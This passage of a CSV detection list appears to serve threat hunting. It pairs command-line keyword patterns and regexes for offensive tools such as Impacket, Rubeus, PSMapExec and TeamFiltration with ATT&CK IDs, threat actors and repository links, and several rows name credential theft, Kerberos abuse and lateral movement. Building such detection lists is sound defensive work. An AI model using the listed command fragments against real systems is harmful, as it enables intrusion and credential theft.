T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3464"
"* --target=* --payload=*cmd.exe /c*",".{0,1000}\s\-\-target\=.{0,1000}\s\-\-payload\=.{0,1000}cmd\.exe\s\/c.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","3465"
"* -target-domain * -outputfile * -no-pass*",".{0,1000}\s\-target\-domain\s.{0,1000}\s\-outputfile\s.{0,1000}\s\-no\-pass.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3466"
"* targetedKerberoast.py *",".{0,1000}\stargetedKerberoast\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3467"
"* -target-ip * -remote-dll *.dll* -local-dll *",".{0,1000}\s\-target\-ip\s.{0,1000}\s\-remote\-dll\s.{0,1000}\.dll.{0,1000}\s\-local\-dll\s.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","3468"
"* --target-name * --domain * --dc-ip * --executable *.exe*",".{0,1000}\s\-\-target\-name\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-\-executable\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","3469"
"* -Targets * -Method * -LocalAuth*",".{0,1000}\s\-Targets\s.{0,1000}\s\-Method\s.{0,1000}\s\-LocalAuth.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3470"
"* -Targets All -Method WMI*",".{0,1000}\s\-Targets\sAll\s\-Method\sWMI.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3471"
"* -Targets DCs*",".{0,1000}\s\-Targets\sDCs.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3472"
"* targets-asn.nse*",".{0,1000}\stargets\-asn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3473"
"* targets-ipv6-map4to6.nse*",".{0,1000}\stargets\-ipv6\-map4to6\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3474"
"* targets-ipv6-multicast-echo.nse*",".{0,1000}\stargets\-ipv6\-multicast\-echo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3475"
"* targets-ipv6-multicast-invalid-dst.nse*",".{0,1000}\stargets\-ipv6\-multicast\-invalid\-dst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3476"
"* targets-ipv6-multicast-mld.nse*",".{0,1000}\stargets\-ipv6\-multicast\-mld\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3477"
"* targets-ipv6-multicast-slaac.nse*",".{0,1000}\stargets\-ipv6\-multicast\-slaac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3478"
"* targets-ipv6-wordlist.nse*",".{0,1000}\stargets\-ipv6\-wordlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3479"
"* targets-sniffer.nse*",".{0,1000}\stargets\-sniffer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3480"
"* targets-traceroute.nse*",".{0,1000}\stargets\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3481"
"* targets-xml.nse*",".{0,1000}\stargets\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3482"
"* --target-user * --dc-ip * -command *",".{0,1000}\s\-\-target\-user\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-command\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","3483"
"* -TaskName ""SQLC2AgentPS*",".{0,1000}\s\-TaskName\s\""SQLC2AgentPS.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3484"
"* -TaskName *AutoRDPwn*",".{0,1000}\s\-TaskName\s.{0,1000}AutoRDPwn.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","3485"
"* -TaskName RedPillTask*",".{0,1000}\s\-TaskName\sRedPillTask.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","windows Scheduled TaskName","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3486"
"* Tater.ps1*",".{0,1000}\sTater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","3487"
"* --tcp-listen 127.0.0.1:* --write * --read *",".{0,1000}\s\-\-tcp\-listen\s127\.0\.0\.1\:.{0,1000}\s\-\-write\s.{0,1000}\s\-\-read\s.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","3488"
"* tdotnet publish Athena *",".{0,1000}\stdotnet\spublish\sAthena\s.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","3489"
"* TeamFiltration.dll*",".{0,1000}\sTeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3490"
"* TeamFiltration.exe*",".{0,1000}\sTeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3491"
"* teams_dump.py*",".{0,1000}\steams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","3492"
"* teams_dump.py*",".{0,1000}\steams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","3493"
"* teamsenum.py*",".{0,1000}\steamsenum\.py.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","3494"
"* teamspeak2-version.nse*",".{0,1000}\steamspeak2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3495"
"* teamstracker.py*",".{0,1000}\steamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","3496"
"* telnet-brute.nse*",".{0,1000}\stelnet\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3497"
"* telnet-encryption.nse*",".{0,1000}\stelnet\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3498"
"* telnet-ntlm-info.nse*",".{0,1000}\stelnet\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3499"
"* --temp-email --target-paths *",".{0,1000}\s\-\-temp\-email\s\-\-target\-paths\s.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3500"
"* termux-chroot */cloudflared*",".{0,1000}\stermux\-chroot\s.{0,1000}\/cloudflared.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","3502"
"* Test different CLientID's against MSGraph to determine permissions*",".{0,1000}\sTest\sdifferent\sCLientID\'s\sagainst\sMSGraph\sto\sdetermine\spermissions.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","3503"
"* test_privesc.py*",".{0,1000}\stest_privesc\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","3504"
"* tftp-enum.nse*",".{0,1000}\stftp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3505"
"* tgssub * /ticket:*",".{0,1000}\stgssub\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3506"
"* TGT_Monitor.ps1*",".{0,1000}\sTGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","3507"
"* tgtdeleg /nowrap*",".{0,1000}\stgtdeleg\s\/nowrap.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3508"
"* tgtdeleg /spn:cifs*",".{0,1000}\stgtdeleg\s\/spn\:cifs.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","3509"
"* tgtdeleg /target:*",".{0,1000}\stgtdeleg\s\/target\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3510"
"* thc-hidra*",".{0,1000}\sthc\-hidra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","3511"
"* theHarvester.py *",".{0,1000}\stheHarvester\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3513"
"* theHarvester.py*",".{0,1000}\stheHarvester\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","3514"
"* Theif.dll*",".{0,1000}\sTheif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","3515"
"* thief.py*",".{0,1000}\sthief\.py.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","3516"
"* ThievingFox.py*",".{0,1000}\sThievingFox\.py.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","3517"
